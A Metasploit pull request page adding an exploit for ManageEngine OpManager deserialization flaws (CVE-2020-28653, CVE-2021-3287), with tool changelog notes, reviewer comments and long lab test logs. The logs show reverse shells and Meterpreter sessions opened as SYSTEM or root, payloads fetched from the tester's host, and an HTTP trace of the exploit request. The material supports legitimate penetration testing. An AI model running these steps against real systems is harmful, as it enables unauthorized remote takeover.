 * Fixed a compatibility bug with diff-lcs v1.4, allowing the tool to work with
   the latest gem
 * Allowed updating existing data sets (use the new --json option)
 * Removed the runme.sh script that would regenerate and overwrite all of the
   payloads
 * Applied Rubocop changes to the offsets tool
 * Updated the Dockerfile to accept arguments, making it more flexible
 * Switched to using an option parser and added long-form names

This will be the 13th module using either the Msf::Exploit::JavaDeserialization
or Msf::Util::JavaDeserialization utility directly. The payloads that are
currently used by those modules are known to work. It doesn't make sense to
update all of the YSoSerial payload blobs at once anymore when changes need to
be made because each payload should really be tested to ensure that the offsets
are correct. The changes to the tool allows individual YSoSerial payloads to be
regenerated and merged into the JSON data file. This means only modified
payloads need to be tested, while the rest remain the same.

In the context of this exploit, this functionality was used to generate and add
the frohoff/ysoserial#168 payload which is a derivative of CommonsBeanutils1 but
has been updated per the vulnerability analysis to remove the dependency on the
commons-collections lib. The name should make it future proof since AFAIK GitHub
Pull Requests can't be deleted and the final name is unknown at this point since
the changes have only been submitted. If the changes are merged in, the name
should be updated. This allows the two PRs to proceed independently of one
another, there's no need to wait for frohoff/ysoserial#168 to be merged first.

The gadget chain was generated by:

 1. Building the PR branch using the supplied Dockerfile
 2. Run the image one so it's accessible
 3. Use docker cp IMAGEID:/app/ysoserial.jar
    tools/payloads/ysoserial/ysoserial-original.jar copying the built
    ysoserial.jar file to the tools directory
 4. Run find_ysoserial_offsets.rb -p CommonsBeanutils1
 5. Merge the output by hand with data/ysoserial_payloads.json, using the new
    name


VERIFICATION

 * Start msfconsole
 * Do: use exploit/multi/http/opmanager_sumpdu_deserialization
 * Set the RHOSTS, TARGET, PAYLOAD and payload-related options as necessary
 * Do: run
 * You should get a shell.


DEMO

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization 
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set TARGET Windows\ PowerShell 
TARGET => Windows PowerShell
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check
[*] 192.168.159.10:8060 - The target appears to be vulnerable.
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] An HTTP session cookie has been issued
[*] The request handler has been associated with the HTTP session
[*] Sending stage (200262 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:50295) at 2021-09-13 16:31:45 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-3MSP8K2LCGC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 7
Meterpreter     : x64/windows
meterpreter >




The text was updated successfully, but these errors were encountered:

🎉 2


smcintyre-r7 added docs module rn-modules labels 23 days ago
adfoster-r7 reviewed 23 days ago
View changes
tools/payloads/ysoserial/Dockerfile


COPY find_ysoserial_offsets.rb /
CMD ruby /find_ysoserial_offsets.rb -a ENTRYPOINT ["ruby",
"/find_ysoserial_offsets.rb"]

Copy link
Contributor


ADFOSTER-R7 23 DAYS AGO

Any context on this change? 🕵️

Sorry, something went wrong.


Copy link
Contributor Author


ZEROSTEINER 23 DAYS AGO •
EDITED

Yeah in the "Java Deserialization Updates" section I mentioned switching the
docker container and dropping runme.sh. This removes the -a flag used by
runme.sh since we shouldn't be updating all payloads at once anymore and makes
the script the entry point so the container can be more easily used with user
specified arguments.

Admittedly once I fixed the diff-lcs 1.4 compatibility issue, I just ran the
offsets tool natively on my system but I could see why some people might want to
run it in docker so I kept the file and made it more flexible. Downloading
specific versions of the built jars is handy to know what revision the payload
data was generated with.

Sorry, something went wrong.


Copy link
Contributor


ADFOSTER-R7 COMMENTED 22 DAYS AGO

Github tests are failing for unrelated reasons, if you rebase against master and
push it up again, they should go green 👍

👍 1

Sorry, something went wrong.

zeroSteiner added 8 commits 22 days ago
Initial work on CVE-2021-3287


02fde3a
Fix the diff-lcs v1.4+ bug


6b90582
Update find_ysoserial_offsets …


5219759

* Apply rubocop suggestions for style
* Support patching an existing JSON file
* Use an OptionParser

Update the YSoSerial Dockerfile and remove runme …


4e28d3d

Remove the runme script because we should no longer be updating all of
the gadget chains at once because doing so would require that quite a
few different modules be updated. Moving forward we should be updating
individual chains using an incremental approach to allow us to validate
the results of the find_ysoserial_offsets tool which is error prone.

Add the generated YSoSerial gadget chain


d483463
Apply rubocop changes and fix all targets


d640866
Add and test the remaining targets


3986707
Write up the module docs

Loading status checks…
d82ed7d
zeroSteiner force-pushed the feat/cve-2021-3287 branch from 4b360f9 to d82ed7d
22 days ago
Correct the CVE reference

Loading status checks…
fb74888
zeroSteiner changed the title Add exploit for CVE-2021-3287 (Manage Engine
OpManager RCE) Add exploit for CVE-2020-28653 (Manage Engine OpManager RCE) 21
days ago
Copy link
Member


JMARTIN-R7 COMMENTED 21 DAYS AGO

@msjenkins-r7 test this please.



Sorry, something went wrong.

space-r7 self-assigned this 21 days ago
smcintyre-r7 changed the title Add exploit for CVE-2020-28653 (Manage Engine
OpManager RCE) Add exploit for CVE-2020-28653 (ManageEngine OpManager RCE) 20
days ago
smcintyre-r7 reviewed 20 days ago
View changes
data/ysoserial_payloads.json

@@ -317,6 +317,17 @@ }, "Wicket1": { "status": "unsupported" },
"frohoff/ysoserial#168": {

Copy link
Contributor


SMCINTYRE-R7 20 DAYS AGO

Named to point to frohoff/ysoserial#168 so both PRs can move forward
independently of each other.

Sorry, something went wrong.

👍 1
smcintyre-r7 reviewed 20 days ago
View changes
modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb Show resolved
Hide resolved

zeroSteiner added 3 commits 20 days ago
Update the module for CVE-2021-3287


9f971e8
Add automatic targeting for the CVEs

Loading status checks…
fd0f565
Add a note about exploitable versions

Loading status checks…
4bccc05
Copy link
Contributor


SPACE-R7 COMMENTED 19 DAYS AGO

Tested various versions on both Linux and Windows:

Version 12.5.328 on Ubuntu 20.04

Linux Dropper Target

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.135
rhost => 192.168.140.135
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command
   1   Windows Dropper
   2   Windows PowerShell
   3   Unix Command
   4   Linux Dropper
   5   Python


msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 4
target => 4
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Using URL: http://0.0.0.0:8080/fWMV6bUCRSxR3U
[*] Local IP: http://192.168.1.199:8080/fWMV6bUCRSxR3U
[*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /fWMV6bUCRSxR3U
[*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3012548 bytes) to 192.168.140.135
[*] Command Stager progress - 134.17% done (161/120 bytes)
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.135:33008) at 2021-09-16 16:49:13 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.140.135
OS           : Ubuntu 20.04 (Linux 5.11.0-34-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >




Python target

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Sending stage (39560 bytes) to 192.168.140.135
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.135:33048) at 2021-09-16 17:13:20 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >



Version 12.3.238 on Ubuntu 20.04 - Failing on "Could not identify the remote
version number"

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[-] Exploit aborted due to failure: unexpected-reply: Could not identify the remote version number
[*] Exploit completed, but no session was created.



Version 12.5.231 on Ubuntu 20.04

Python and Linux Targets

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.231
[*] The request handler has been associated with the HTTP session
[*] Sending stage (39556 bytes) to 192.168.140.135
[*] Meterpreter session 3 opened (192.168.140.1:4444 -> 192.168.140.135:52602) at 2021-09-16 17:30:00 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.140.135 - Meterpreter session 3 closed.  Reason: Died
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 4
target => 4
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.231
[*] The request handler has been associated with the HTTP session
[*] Using URL: http://0.0.0.0:8080/C6ouWVVE7yazy6S
[*] Local IP: http://192.168.1.199:8080/C6ouWVVE7yazy6S
[*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /C6ouWVVE7yazy6S
[*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3012548 bytes) to 192.168.140.135
[*] Command Stager progress - 133.88% done (162/121 bytes)
[*] Meterpreter session 4 opened (192.168.140.1:4444 -> 192.168.140.135:52606) at 2021-09-16 17:30:18 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.140.135
OS           : Ubuntu 20.04 (Linux 5.11.0-34-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >



Version 12.5.328 on Windows 10 x64

Windows Command and Dropper Targets

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.144
rhost => 192.168.140.144
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > options

Module options (exploit/multi/http/opmanager_sumpdu_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CVE        Automatic        yes       Vulnerability to use (Accepted: Automatic, CVE-2020-28653, CVE-2021-3287)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.140.144  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8060             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
                                          or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       OpManager path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.140.1    yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse SSL handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Powershell session session 1 opened (192.168.140.1:4444 -> 192.168.140.144:52715) at 2021-09-17 11:08:16 -0500

Windows PowerShell running as user space on DESKTOP-S81CMN3
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files\ManageEngine\OpManagerCentral\bin>whoami
desktop-s81cmn3\space
PS C:\Program Files\ManageEngine\OpManagerCentral\bin> ^C
Abort session 1? [y/N]  y

[*] 192.168.140.144 - Powershell session session 1 closed.  Reason: User exit
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command
   1   Windows Dropper
   2   Windows PowerShell
   3   Unix Command
   4   Linux Dropper
   5   Python

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 1
target => 1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Command Stager progress -  17.11% done (2057/12025 bytes)
[*] Command Stager progress -  34.21% done (4114/12025 bytes)
[*] Command Stager progress -  51.32% done (6171/12025 bytes)
[*] Command Stager progress -  68.42% done (8228/12025 bytes)
[*] Command Stager progress -  84.70% done (10185/12025 bytes)
[*] Command Stager progress - 100.55% done (12091/12025 bytes)
[*] Sending stage (200262 bytes) to 192.168.140.144
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.144:52727) at 2021-09-17 11:09:13 -0500

meterpreter > getuid
Server username: DESKTOP-S81CMN3\space
meterpreter > sysinfo
Computer        : DESKTOP-S81CMN3
OS              : Windows 10 (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >



Version 12.3.295 on Windows Server 2019 - Failing on "Could not identify the
remote version number"

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set httptrace true
httptrace => true
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check

####################
# Request:
####################
POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
Host: 192.168.140.149:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

??w?
####################
# Response:
####################
HTTP/1.1 200
Set-Cookie: JSESSIONID=3931AB320540EB670CA48B767BCA97F5; Path=/; HttpOnly
Content-Length: 4
Vary: Accept-Encoding
Date: Fri, 17 Sep 2021 20:40:20 GMT

??
[*] 192.168.140.149:8060 - The service is running, but could not be validated.
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse SSL handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
Host: 192.168.140.149:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

??w?
####################
# Response:
####################
HTTP/1.1 200
Set-Cookie: JSESSIONID=DB82AAAF2C105D85F8BA3464F194E142; Path=/; HttpOnly
Content-Length: 4
Vary: Accept-Encoding
Date: Fri, 17 Sep 2021 20:40:30 GMT

??
[!] The service is running, but could not be validated.
####################
# Request:
####################
GET / HTTP/1.1
Host: 192.168.140.149:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)


####################
# Response:
####################
HTTP/1.1 200
Cache-Control: private
Expires: Wed, 31 Dec 1969 18:00:00 CST
Set-Cookie: JSESSIONID=E3F79E8675738CB73D8F6F346C24B664; Path=/; HttpOnly
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Vary: Accept-Encoding
Date: Fri, 17 Sep 2021 20:40:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">





































	<head>
	<!--[if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1' /><![endif]-->
	<script>
		sessionStorage.clear();
		var ntlm = false;
	</script>

			<input type="hidden" id="loadCookieMethod" value="true">
	<title>
		
		
		
			ManageEngine OpManager
		
		
	</title>






<script type="text/javascript">

function GetXmlHttpObject()
{ 
    var objXMLHttp=null
    if (window.XMLHttpRequest)
    {
        objXMLHttp=new XMLHttpRequest()
        if (objXMLHttp.overrideMimeType) {
         	// set type accordingly to anticipated content type
            objXMLHttp.overrideMimeType('text/xml'); //No I18N
         }
    }
    else if (window.ActiveXObject)
    {
         try {
            objXMLHttp = new ActiveXObject("Msxml2.XMLHTTP");
         } catch (e) {
            try {
               objXMLHttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {}
        }
    }
    return objXMLHttp
}
</script>
<SCRIPT LANGUAGE="javascript" SRC="/apiclient/fluidicv2/javascript/jquery/jquery-1.9.0.min.js"></SCRIPT>


<script language="JavaScript">
function showForgotPassword()
{		$("#loginFirst").slideUp(400);
        $("#errorDiv").hide();
        $("#mailErrorDiv").hide();
        $("#forgotPassStatus").hide();
        
        document.getElementById("authenticationDiv").style.display="none";
        document.getElementById("forgotPasswordDiv").style.display="block";

        $('#authenticationDiv').css({left:'-100%',opacity:'0'});
        $('#forgotPasswordDiv').css({left:'0',opacity:'1'});
}

function returnLogin()
{
	document.getElementById("forgotPassStatus").innerHTML="";
	document.getElementById("forgotPassStatus").style.display="none";
	document.getElementById("forgotPasswordDiv").style.display="none";
    document.getElementById("authenticationDiv").style.display="block";

    $('#authenticationDiv').css({left:'0',opacity:'1'});
    $('#forgotPasswordDiv').css({left:'100%',opacity:'0'});
}

function generatePwd(mailId)
{
        if(document.loginForm.uname.value=="")
        {
                alert("Kindly provide all the details.");
                return;
        }
        else
        {
		        xmlHttp = GetXmlHttpObject();
                if(xmlHttp != null)
                {
                        xmlHttp.onreadystatechange = processStateChange;
                        //var url = "/admin/SendPassword.do?uname="+document.loginForm.uname.value+"&domainName=NULL"; //No i18n
			var url = "/servlets/ForgotPasswordServlet?uname="+document.loginForm.uname.value+"&domainName=NULL"; //No i18n
                        url= url+"&sid="+Math.random(); //No I18N
                        xmlHttp.open("POST",url,true);
                        xmlHttp.send(null);
                }
        }
}

function processStateChange()
{
        if(xmlHttp.readyState == 4 || xmlHttp.readyState == "complete")
        {
		document.getElementById("forgotPassStatus").style.display="block";
        document.getElementById("forgotPassStatus").innerHTML=xmlHttp.responseText;
        }
}

function GetXmlHttpObject()
{
        var objXmlHttp = null;
        if(window.XMLHttpRequest)
        {
                objXmlHttp = new XMLHttpRequest();
        }
        else if(window.ActiveXObject)
        {
                objXmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        return objXmlHttp;
}

var uName = "";
var autoSigin = "";
var pwd = "";
var dName = "";
var encyptedpwd = "";
var authrule_name = "";

function setincheckbox()
{
 var url = "/servlets/SettingsServlet?"; //No I18N
        var dataParams = "readAutoLoginCookie=true";//No I18N
        if(window.location.pathname === "/apiclient/ember/index.jsp" && window.location.hash.indexOf('#/') !== -1){
            dataParams=dataParams+"&cookieUpdate=true&cookieName=f2RedirectUrl&cookieValue="+window.location.href+"&cookieExpiry=-1";//No I18N
        }else{
            dataParams=dataParams+"&eraseCookie=true&cookieName=f2RedirectUrl";//No I18N
        }
        $.ajax({
            url: url,
            type: "POST",//No I18N
            dataType: 'json',//No I18N
            async: false,
            data:dataParams,
            success: function(jsonData)
            {
                uName = jsonData.userNameForAutomaticSignin;
                autoSigin = jsonData.signInAutomatically;
                pwd = jsonData.password;
                dName = jsonData.domainNameForAutomaticSignin;
                encyptedpwd=jsonData.encryptPassForAutomaticSignin;
                authrule_name=jsonData.authrule_name;
            }
        });
    if(autoSigin == "false")
    {
    jQuery("#StayIn").removeAttr('checked'); //no i18n
    }
    else
    {
    jQuery("#StayIn").attr('checked',"true"); //no i18n
    }
}

function loadCredentialsFromCookie()
{
    setScreenSize();
       
    var loadCookie = document.getElementById("loadCookieMethod").value;
	if(autoSigin=="true" && (uName!==undefined && uName!=null && uName!="") && (loadCookie!==undefined && loadCookie!=null && loadCookie=="true"))
	{
		var errorExist = "false";

		if(document.getElementById("errorMsg") !== undefined && document.getElementById("errorMsg") !== null)
		{
			errorExist = document.getElementById("errorMsg").innerHTML;
		}
	
         	if(errorExist==="false")
        	{
			signOn(uName,encyptedpwd,dName,authrule_name);
		}
		else
		{
			var e = document.getElementById("LoginDiv").style;
                        e.display = "block";
                        if ( uName!=null )
                        {
                                document.loginForm.userName.value = uName;
                        }
                        if ( pwd!=null )
                        {
                            document.loginForm.password.value =  pwd;
                        }
                        document.loginForm.userName.focus();
		}
	}
	else
	{
		var e = document.getElementById("LoginDiv").style;
		e.display = "block";
		if ( uName!=null )
		{
			document.loginForm.userName.value = uName;
        } 

		if ( pwd!=null )
		{
			document.loginForm.password.value =  pwd; 
		}
         else
        {
           document.getElementById('password').setAttribute("class","loginFont pwdField opacity3");
        }
		document.loginForm.userName.focus();
	}
}

function signOn(uName,pwd,dName,authrule_name)
{
		document.loginForm.loginFromCookieData.value = true;
		document.loginForm.userName.value = uName;	
        document.loginForm.password.value = pwd; 
		document.loginForm.AUTHRULE_NAME.value=authrule_name;
		if(authrule_name=="ADAuthenticator")
		{
            $('#domainNameDiv').attr({
                name:'domainName', //No I18N
                value:dName
            });
			if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null)
			{
				document.loginForm.domainNameAD.value=dName;
			}
		}
		else if(authrule_name=="RadiusAuthenticator")
		{
			$('#domainNameDiv').removeAttr('name value'); //No I18N
			if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null)
			{
				document.loginForm.domainNameAD.value="radiusUserLogin"; //No I18N
			}
		}
		else
		{
			$('#domainNameDiv').removeAttr('name value'); //No I18N
			if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null)
			{
				document.loginForm.domainNameAD.value="Authenticator"; //No I18N
			}
		}	
        document.loginForm.submit();
}

// function userType()
// {
//     var id = document.getElementById("loginFirst");
//     if (false)
//     {
//         //alert('Showing the userDetails');
//         eval("id.style.visibility = 'visible';");
//     }
//     else
//     {
//         eval("id.style.visibility = 'hidden';");
//     }
// }


var xmlHttp

// function clearLoginInfo()
// {
//     xmlHttp=GetXmlHttpObject()
//     if (xmlHttp==null)
//     {
//         alert ("Browser does not support HTTP Request"); //No I18N
//         return
//     }
//     var url="/showDetails.do?requestid=false"; //No I18N
//     url=url+"&sid="+Math.random();//No I18N
//     xmlHttp.onreadystatechange=processReqChange
//     xmlHttp.open("GET",url,true)
//     xmlHttp.send(null)
// }

// function processReqChange()
// {
//     // only if xmlHttp shows "complete"
//     if (xmlHttp.readyState == 4)
//     {
//         // only if "OK"
//         if (xmlHttp.status == 200)
//         {
//             // ...processing statements go here...
//             response  = xmlHttp.responseXML.documentElement;
//             result    = response.getElementsByTagName('result')[0].firstChild.data;
//             //result = unescape(result);
//             var id = document.getElementById("loginFirst");
//             if(result) {
//                 //document.getElementById("loginFirst").visibility = 'visible';
//                 eval("id.style.visibility = 'hidden';");
//             }
//             else
//             {
//                 eval("id.style.visibility = 'visible';");
//             }
//         }
//         else
//         {
//     	    alert("There was a problem retrieving the XML data:\n" + xmlHttp.statusText); //No I18N
//         }
//     }
//     //alert("Status Text:\n" + xmlHttp.statusText);
// }

function GetXmlHttpObject()
{
    var objXMLHttp=null
    if (window.XMLHttpRequest)
    {
        objXMLHttp=new XMLHttpRequest()
    }
    else if (window.ActiveXObject)
    {
        objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP")
    }
    return objXMLHttp
}


function loginSubmit()
{
	if(document.getElementById("authenticationDiv").style.display=='block')
	{
	    if(validateUser()) {
        	//document.loginForm.submit();
		return true;
	    }
		else
		{
			return false;
		}
	}
	else
	{
		generatePwd();
	}
}

function checkLogin(e)
{
   var characterCode;
      if(e && e.which){
       e = e
       characterCode = e.which
   }
   else{
       e = event
       characterCode = e.keyCode
   }
         if(characterCode == 13)
       loginSubmit();
}


function validateUser()
{
	if(document.getElementById("authenticationDiv").style.display=='block')
	{
		document.loginForm.loginFromCookieData.value = false;	
	    var userName = trimAll(document.loginForm.userName.value);
        var password = trimAll(document.loginForm.password.value);
        if(userName == "")
        {
                alert("Please enter the User Name");
                document.loginForm.userName.focus();
                return false;
        }
        if(password == "")
        {
                alert("Please enter the password");
                document.loginForm.password.focus();
                return false;
        }
       	var defaultDomainValue="Authenticator";//no i18n
		if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD.value !== null)
		{
			defaultDomainValue=document.loginForm.domainNameAD.value;
		}
		
		if(defaultDomainValue=='NULL')
		{
			defaultDomainValue="Authenticator";//no i18n
		}
		if(userName=='trialuserlogin')
		{
			defaultDomainValue="Authenticator";//no i18n
		}
		if(  document.loginForm.signInAutomatically.checked != null && document.loginForm.signInAutomatically.checked === true)
        	{
			var url = "/servlets/SettingsServlet?requestType=AJAX&sid="+Math.random(); //No I18N
            var dataParams = "EncryptPassword="+password+"&userName="+userName+"&domainName="+defaultDomainValue+"&autoSignIn="+document.loginForm.signInAutomatically.checked+"&authRuleName="+document.loginForm.AUTHRULE_NAME.value;//No I18N

                $.ajax({
                    url: url,
                    type: "POST",//No I18N
                    dataType: "html",//No I18N
                    async: false,
                    data:dataParams
                 });
            }
            else
            {
                var url = "/servlets/SettingsServlet?requestType=AJAX&sid="+Math.random(); //No I18N
                var dataParams ="eraseAutoLoginCookie=true&cookieUpdate=true&cookieName=signInAutomatically&cookieValue=false&cookieExpiry=30";//No I18N

                $.ajax({
                    url: url,
                    type: "POST",//No I18N
                    dataType: "html",//No I18N
                    async: false,
                    data:dataParams
                 });
            }
            return true;
	}
	else
	{
		generatePwd();
	}

}


function setScreenSize() {
//getFlashVersion();

    var screenWidth = 0, screenHeight = 0;
    if( typeof( window.innerWidth ) == 'number' ) {
        //Non-IE
        screenWidth = window.innerWidth;
        screenHeight = window.innerHeight;
    }
    else if(document.documentElement && (document.documentElement.clientWidth || document.documentElement.clientHeight))
   {
        //IE 6+ in 'standards compliant mode'
        screenWidth = document.documentElement.clientWidth;
        screenHeight = document.documentElement.clientHeight;
    }
    else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
        //IE 4 compatible
        screenWidth = document.body.clientWidth;
        screenHeight = document.body.clientHeight;
    }
    //window.alert( 'Width = ' + screenWidth );
    //window.alert( 'Height = ' + screenHeight );
    document.loginForm.ScreenWidth.value =screenWidth;
    document.loginForm.ScreenHeight.value = screenHeight;

}

/*function getFlashVersion(){
	var version = deconcept.SWFObjectUtil.getPlayerVersion();
	var myflashversion =version['major'] +"."+ version['minor'] +"."+ version['rev'];
	if (document.getElementById && (version['major'] >= 0)) {
		createCookie("flashversionInstalled" ,myflashversion, 2);
	}
}*/

function showDiv(DivId){
	document.getElementById(DivId).style.display = 'block';
}
// function hideDiv(DivId){
// 	if(DivId == 'loginFirst'){
// 	document.getElementById('loginFirst').innerHTML ="<table width=\"373\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tr><td width=\"13\" height=\"21\"><img src=\"/webclient/common/images/spacer.gif\" alt=\" \" /></td><td  width=\"339\"></td><td width=\"21\" height=\"21\"><a href=\"javascript:hideDiv('loginFirst');clearLoginInfo();\"><img src=\"/webclient/common/images/spacer.gif\" border=\"0\" title=\"close\" /></a></td></tr></table>"
// 	}else{
// 		document.getElementById(DivId).style.display = 'none';
// 	}
// }
// function forgetPass(){
// 	hideDiv('authenticationDiv'); //No I18N
// 	//hideDiv('loginFirst');
